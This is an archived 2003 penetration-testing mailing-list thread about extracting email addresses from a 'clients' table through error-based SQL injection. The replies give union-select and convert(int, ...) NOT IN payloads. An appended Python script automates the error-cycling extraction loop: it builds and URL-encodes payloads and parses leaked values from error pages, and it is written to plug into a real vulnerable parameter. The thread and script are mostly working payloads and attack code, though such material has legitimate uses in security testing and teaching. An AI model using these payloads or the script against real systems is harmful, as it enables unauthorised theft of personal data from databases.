Re: SQL injection - get more values

From: Thaidn (thaidnat_private)
Date: Wed Feb 12 2003 - 19:52:22 PST


    Hello dude,
    You can't use "union" or "having" when the original query looks like "select *
    from table" or "select image from table", but this disadvantage can be bypassed
    easily by using convert(int,(your injected query)). Just put in ' and
    convert(int,(injected query)), and all the data is in your hands :D.
    
    On Thursday 13 February 2003 01:51 am, Panos Dimitriou wrote:
    > One solution is to try to find the exact columns to perform a union
    > select by replacing 1s with 'foo' when you get the error message "
    > operand type clash: text is incompatible with int"
    >
    > Example:
    >
    > ') union all select sum(email),1,1,1.... from clients--
    > until you get: operand type clash: text is incompatible with int. Then
    > change the last 1 to 'foo' and continue with 1s, and so on and so
    > forth.
    >
    > The other solution is to try to get all the data through error cycling,
    > as you already tried and use NOT IN as follows:
    >
    > ' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in
    > ('anonat_private','othermailat_private',...))) %2b '
    >
    > I hope this works
    >
    > Panos Dimitriou
    > Director, MSS
    >
    >
    > -----Original Message-----
    > From: Daniel Savi [mailto:dssat_private]
    > Sent: Wednesday, February 12, 2003 7:49 PM
    > To: pen-testat_private
    > Subject: SQL injection - get more values
    >
    >
    >
    > Hi :)
    >
    > I'm trying to get some info from the clients table and its email field....
    >
    > I tried this param in gubpage.asp?=...
    > ') union select sum(email) from clients--
    > and got an error about all queries needed... so I tried to solve it with
    > ') union select sum(email),1,1,1.... from clients--
    > until I got: operand type clash: text is incompatible with int
    >
    > I found this answer in this forum (thanks :)); it was:
    > ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
    >
    > I got this:
    > Syntax error converting the varchar value 'anonat_private' to a column of
    > data type int
    >
    > Now, my problem: how can I get other e-mails from the table, knowing one
    > valid value?
    >
    > I tried this
    > ' %2b convert(int, (SELECT email FROM clients WHERE email > 'anonat_private')) %2b '
    >
    > but with no success.
    >
    > I think I can use NOT IN, but I'm not sure how to use it with convert...
    >
    > Any tips are welcome!
    >
    > Thanks
    >
    > ------------------------------------------------------------------------
    > ----
    > This list is provided by the SecurityFocus Security Intelligence Alert
    > (SIA)
    > Service. For more information on SecurityFocus' SIA service which
    > automatically alerts you to the latest security vulnerabilities please
    > see:
    > https://alerts.securityfocus.com/
    
    
    
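The error-cycling loop that Panos describes (and the convert(int, ...) trick Thaidn recommends for queries where union cannot be used), written out as an added example. This is not code from any of the posters. The script builds each successive NOT IN payload, URL-encodes it (the %2b in the thread is the encoded +), pulls the leaked value out of the "Syntax error converting the varchar value ..." message quoted above, and repeats until the server stops erroring. The `send` callable, the `make_fake_target` stand-in (an in-memory SQLite table with SQL Server's convert(int, <text>) failure emulated) and the sample addresses are all assumptions constructed for the example.

```python
import re
import sqlite3
import urllib.parse
from typing import Callable, List, Optional

# Shape of the SQL Server 2000 error quoted in the thread.  The capture group is
# the text value that convert(int, ...) choked on, i.e. the leaked row.
ERR_RE = re.compile(
    r"Syntax error converting the varchar value '(.*?)' to a column of data type int"
)


def sql_literal(value: str) -> str:
    """Quote a string as a T-SQL literal; embedded single quotes are doubled."""
    return "'" + value.replace("'", "''") + "'"


def build_payload(extracted: List[str], table: str = "clients", column: str = "email") -> str:
    """Raw (not yet URL-encoded) injection string for one round of error cycling.

    Round 1 asks for max(column) over the whole table; each later round excludes
    every value already leaked with NOT IN, so max() yields the next-highest one.
    """
    where = ""
    if extracted:
        where = f" WHERE {column} NOT IN ({', '.join(sql_literal(v) for v in extracted)})"
    subquery = f"SELECT max({column}) FROM {table}{where}"
    return f"' + convert(int, ({subquery})) + '"


def encode_payload(raw: str) -> str:
    """URL-encode for the query string: '+' must travel as %2B, or the server
    decodes it as a space and the string concatenation never happens."""
    return urllib.parse.quote(raw, safe="")


def leaked_value(response_body: str) -> Optional[str]:
    """Pull the leaked value out of the error page, or None if there was no error."""
    m = ERR_RE.search(response_body)
    return m.group(1) if m else None


def extract_column(send: Callable[[str], str], table: str = "clients",
                   column: str = "email", limit: int = 1000) -> List[str]:
    """Walk the column from its highest value downwards, one round trip per row.

    `send` (hypothetical transport; plug in your own HTTP client) takes the raw
    payload and returns the response body.  The walk stops when the server stops
    erroring: NOT IN has excluded every row, so max() is NULL and
    convert(int, NULL) succeeds silently.  Blind spot: a value that looks
    numeric also converts cleanly and ends the walk early.
    """
    found: List[str] = []
    for _ in range(limit):
        value = leaked_value(send(build_payload(found, table, column)))
        if value is None or value in found:
            break
        found.append(value)
    return found


def make_fake_target(rows: List[str]) -> Callable[[str], str]:
    """Constructed stand-in for the vulnerable gubpage.asp so the loop runs offline.

    The injected subquery is executed for real against an in-memory SQLite table;
    only SQL Server's convert(int, <text>) failure is emulated.
    """
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE clients (email TEXT)")
    db.executemany("INSERT INTO clients VALUES (?)", [(r,) for r in rows])
    subquery_re = re.compile(r"convert\(int, \((.*)\)\)")

    def send(raw_payload: str) -> str:
        m = subquery_re.search(raw_payload)
        if not m:
            return "<html>normal page</html>"
        (value,) = db.execute(m.group(1)).fetchone()
        if value is None:
            return "<html>normal page</html>"  # convert(int, NULL) is NULL: no error
        try:
            int(value)  # numeric-looking text converts fine and leaks nothing
            return "<html>normal page</html>"
        except ValueError:
            return (f"Syntax error converting the varchar value '{value}' "
                    "to a column of data type int")

    return send


if __name__ == "__main__":
    # Constructed sample data, not addresses from the thread.
    target = make_fake_target(["anon@example.test", "bob@example.test",
                               "o'neil@example.test", "zed@example.test"])
    for address in extract_column(target):
        print(address)
```

Against a real target, `send` would put `encode_payload(raw)` into the vulnerable parameter and return the body. Thaidn's `' and convert(int,(...))` form uses the same subquery and the same error parser; only the wrapper string in `build_payload` changes. Two practical limits: the NOT IN list grows by one literal per row, so the URL eventually hits the server's query-string length limit (order by a shorter key, or switch to a `> 'last value'` walk as Daniel tried, with the comparison applied to a single column), and a row whose value parses as an integer converts without error and silently ends the walk.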



    This archive was generated by hypermail 2b30 : Thu Feb 13 2003 - 07:05:57 PST